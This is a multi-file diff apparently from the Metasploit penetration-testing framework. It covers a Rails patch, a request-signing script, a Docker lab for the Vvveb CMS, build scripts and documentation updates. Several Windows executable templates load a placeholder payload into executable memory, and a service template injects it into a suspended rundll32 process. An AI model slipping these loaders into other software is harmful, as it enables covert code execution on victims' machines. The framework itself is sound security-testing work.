@@ -4,6 +4,26 @@ Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

+require 'action_view'
+# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
+# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
+raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
+module ActionView::Helpers::TagHelper
+  class TagBuilder
+    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
+      code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
+        # Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
+        # which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
+        batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
+              def #{method_name}(content = nil, escape: true, **options, &block)
+                tag_string("#{name}", content, options, escape: escape, &block)
+              end
+            RUBY
+      end
+    end
+  end
+end
+
 all_environments = [
    :development,
    :production,
@@ -0,0 +1,88 @@
+import hashlib
+import re
+import argparse
+import sys
+from urllib.parse import urlsplit, parse_qs, unquote, quote
+from typing import Dict, List, Tuple
+
+_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
+
+def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
+    if not method or not path:
+        raise ValueError("Method and path must be provided.")
+
+    url_parts = urlsplit(path)
+    base_path = url_parts.path
+    
+    if not base_path.startswith('/'):
+        base_path = '/' + base_path
+    
+    raw_query_params: Dict[str, List[str]] = parse_qs(
+        url_parts.query, keep_blank_values=True, strict_parsing=False
+    )
+    
+    canonical_query: List[Tuple[str, str]] = []
+    for k, v_list in raw_query_params.items():
+        if k == '_signature':
+            continue
+            
+        value = unquote(v_list[0]) if v_list else ''
+        canonical_query.append((k, value))
+    
+    canonical_query.sort(key=lambda item: item[0])
+    
+    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
+
+    if query_string:
+        canonical_path = f"{base_path}?{query_string}"
+    else:
+        canonical_path = base_path
+        
+    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
+
+    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
+    
+    if not key:
+        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    else:
+        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
+
+    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
+    
+    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
+
+def main():
+    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
+
+    parser.add_argument('--method', type=str, required=True,
+                        choices=['GET', 'POST', 'PUT', 'DELETE'],
+                        help="The HTTP method (e.g., GET).")
+    parser.add_argument('--path', type=str, required=True,
+                        help="The canonical path (e.g., /api/resource?param=value).")
+    parser.add_argument('--key', type=str, default='',
+                        help="The secret key. Defaults to an empty string.")
+    parser.add_argument('--body', type=str, default='',
+                        help="The request body as a string. Defaults to an empty string.")
+
+    try:
+        args = parser.parse_args()
+        
+        signature = compute_signature(
+            method=args.method,
+            path=args.path,
+            body=args.body,
+            key=args.key
+        )
+
+        print(f"Computed Signature: {signature}")
+
+    except ValueError as e:
+        sys.stderr.write(f"Error: {e}\n")
+        sys.exit(1)
+    except Exception as e:
+        sys.stderr.write(f"An unexpected error occurred: {e}\n")
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,25 @@
+FROM php:8.3-fpm
+
+RUN apt-get clean && apt-get update && \
+    apt-get install -y \
+        wget unzip \
+        libicu-dev \
+        libfreetype6-dev \
+        libjpeg62-turbo-dev \
+        libxml2-dev \
+        libwebp-dev \
+        libpng-dev \
+        libzip-dev \
+        libonig-dev \
+        libcurl4-openssl-dev && \
+    docker-php-ext-configure gd --with-webp --with-jpeg && \
+    docker-php-ext-install -j$(nproc) gd xml dom curl mbstring intl gettext zip mysqli && \
+    pecl install apcu && docker-php-ext-enable apcu && \
+    rm -rf /var/lib/apt/lists/*
+
+WORKDIR /var/www/html
+
+RUN wget https://github.com/givanz/Vvveb/releases/download/1.0.5/latest.zip && \
+    unzip latest.zip && rm latest.zip
+
+COPY php.ini /usr/local/etc/php/php.ini
@@ -0,0 +1,43 @@
+services:
+  php:
+    build: .
+    container_name: vvveb-php
+    volumes:
+      - vvveb_html:/var/www/html
+    networks:
+      - vvveb-net
+
+  nginx:
+    image: nginx:stable
+    container_name: vvveb-nginx
+    ports:
+      - "8080:80"
+    volumes:
+      - ./nginx.conf:/etc/nginx/conf.d/default.conf
+      - vvveb_html:/var/www/html:ro
+    depends_on:
+      - php
+    networks:
+      - vvveb-net
+
+  mysql:
+    image: mysql:5.7
+    container_name: vvveb-mysql
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root
+      MYSQL_DATABASE: vvveb
+      MYSQL_USER: vvveb
+      MYSQL_PASSWORD: vvveb
+    volumes:
+      - db_data:/var/lib/mysql
+    networks:
+      - vvveb-net
+
+networks:
+  vvveb-net:
+    driver: bridge
+
+volumes:
+  db_data:
+  vvveb_html:
@@ -0,0 +1,21 @@
+server {
+    listen 80;
+    server_name localhost;
+
+    root /var/www/html;
+    index index.php index.html;
+
+    location / {
+        try_files $uri $uri/ /index.php?$args;
+    }
+
+    location ~ \.php$ {
+        try_files $uri =404;
+        fastcgi_split_path_info ^(.+\.php)(/.+)$;
+        fastcgi_pass php:9000;
+        fastcgi_index index.php;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+        fastcgi_param PATH_INFO $fastcgi_path_info;
+    }
+}
@@ -0,0 +1,5 @@
+display_errors = On
+memory_limit = 512M
+upload_max_filesize = 64M
+post_max_size = 64M
+max_execution_time = 300
@@ -1,8 +1,8 @@
 # PE Source Code
 This directory contains the source code for the PE executable templates.

-## Building DLLs
-Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+## Building
+Use the provided `build_all.bat` file, and run it from within the Visual Studio
 developer console. The batch file requires that the `%VCINSTALLDIR%` environment
 variable be defined (which it should be by default). The build script will
 create both the x86 and x64 templates before moving them into the correct
@@ -0,0 +1,17 @@
+@echo off
+
+echo Compiling DLLs
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  call build.bat
+  popd
+)
+
+echo Compiling EXEs
+
+for /D %%e in (exe*) do (
+  pushd "%%e"
+  call build.bat
+  popd
+)
@@ -1,7 +0,0 @@
-@echo off
-
-for /D %%d in (dll*) do (
-  pushd "%%d"
-  build.bat
-  popd
-)
@@ -3,6 +3,7 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,26 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
@@ -1,343 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="service"
-	ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-	RootNamespace="service"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../service.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../template_x64_windows_svc.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\service.c"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
@@ -1,11 +1,11 @@
-#include <stdio.h>
+#include <windows.h>

 #define SCSIZE 4096
-char payload[SCSIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

-char comment[512] = "";
-
-int main(int argc, char **argv) {
-	(*(void (*)()) payload)();
-	return(0);
+void main() {
+	DWORD dwOldProtect;
+	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
+	(*(void (*)()) bPayload)();
+	return;
 }
@@ -1,32 +0,0 @@
-; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Architecture: x64
-;
-; Assemble and link with the following command:
-; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main 
-
-extrn ExitProcess : proc
-extrn VirtualAlloc : proc
-
-.code
-
-	main proc 
-		sub rsp, 40        ;
-		mov r9, 40h        ; 
-		mov r8, 3000h      ; 
-		mov rdx, 4096      ; 
-		xor rcx, rcx       ; 
-		call VirtualAlloc  ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
-		mov rcx, 4096      ;
-		mov rsi, payload   ;
-		mov rdi, rax       ;
-		rep movsb          ; memcpy( lpPayload, payload, 4096 );
-		call rax           ; lpPayload();
-		xor rcx, rcx       ;
-		call ExitProcess   ; ExitProcess( 0 );
-	main endp
-	
-	payload proc
-		A byte 'PAYLOAD:'
-		B db 4096-8 dup ( 0 )
-	payload endp
-end
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,16 +1,28 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>

-#define PAYLOAD_SIZE	8192
+#define SCSIZE 8192

 char cServiceName[32] = "SERVICENAME";

-char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

 SERVICE_STATUS ss;

 SERVICE_STATUS_HANDLE hStatus = NULL;

+#if BUILDMODE == 2
+/* hand-rolled bzero allows us to avoid including ms vc runtime */
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+#endif
+
 /*
 *
 */
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	PROCESS_INFORMATION pi;
 	LPVOID lpPayload = NULL;

-	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
-	ZeroMemory( &si, sizeof(STARTUPINFO) );
-	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
+	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
+	inline_bzero( &si, sizeof(STARTUPINFO) );
+	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

 	si.cb = sizeof(STARTUPINFO);

@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

 	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
-  
+
 	if ( hStatus )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
-		  
+
 			GetThreadContext( pi.hThread, &Context );
-		  
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
 #ifdef _WIN64
-				Context.Rip = (DWORD64)lpPayload;
+				Context.Rip = (ULONG_PTR)lpPayload;
 #else
-				Context.Eip = (DWORD)lpPayload;
+				Context.Eip = (ULONG_PTR)lpPayload;
 #endif
 				SetThreadContext( pi.hThread, &Context );
 			}

 			ResumeThread( pi.hThread );
-			
+
 			CloseHandle( pi.hThread );
-		  
+
 			CloseHandle( pi.hProcess );
 		}
-		
+
 		ServiceHandler( SERVICE_CONTROL_STOP );
-		
+
 		ExitProcess( 0 );
 	}
 }
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 /*
 *
 */
-int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
+void main()
 {
-	SERVICE_TABLE_ENTRY st[] = 
-    { 
-        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
-        { NULL, NULL } 
-    };
-	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	SERVICE_TABLE_ENTRY st[] =
+		{
+			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
+			{ NULL, NULL }
+		};
+	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	return;
 }
@@ -57,4 +57,4 @@ override.
 ```bash
 echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
 ```
-Now you should be able get reverse shells working
+Now you should be able to get reverse shells working
@@ -1 +1 @@
-3.2.5
+3.3.8
@@ -1,18 +1,38 @@
-# Chat
+# Primary Communication Channels

-A lot of our discussion happens on IRC in #metasploit on Freenode.
+## GitHub Discussions
+For community support, questions, and general discussion, visit our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions).
+
+## Slack
+Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat with the community and developers.
+
+## GitHub Issues
+Submit bug reports and feature requests through [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues).
+
+# Additional Communication Channels
+
+## Chat
+
+Some community discussion still happens on IRC in #metasploit on Freenode.
 Please be patient and hang around for a while -- not everyone is awake
 at the same time as you. =)

-# Mailing list
+## Mailing list

 The Metasploit development mailing list used to be hosted on SourceForge, but is now on Google Groups. Metasploit Hackers is dead, long live [Metasploit Hackers][list]. (Or [mailto:Metasploit Hackers][mailto]).

 The old list [is archived on seclists.org][archive].

+## Social Media
+
+- **X**: [@metasploit](https://x.com/metasploit)
+- **Mastodon**: [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit)
+- **Blog**: [Rapid7 Blog - Metasploit Tag](https://www.rapid7.com/blog/tag/metasploit/)
+- **YouTube**: [Metasploit YouTube](https://youtube.com/@MetasploitR7)
+
 # Abuse

-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to caitlin_condon@rapid7.com or todb@metasploit.com.
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.


 [archive]: http://seclists.org/metasploit/ "Metasploit mailing list archive"
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 | Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
 |--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
-| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
-| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.8-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.8-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Linux 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
 | [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
@@ -6,4 +6,4 @@
 * [Facts and myths about antivirus evasion with Metasploit](http://schierlm.users.sourceforge.net/avevasion.html)
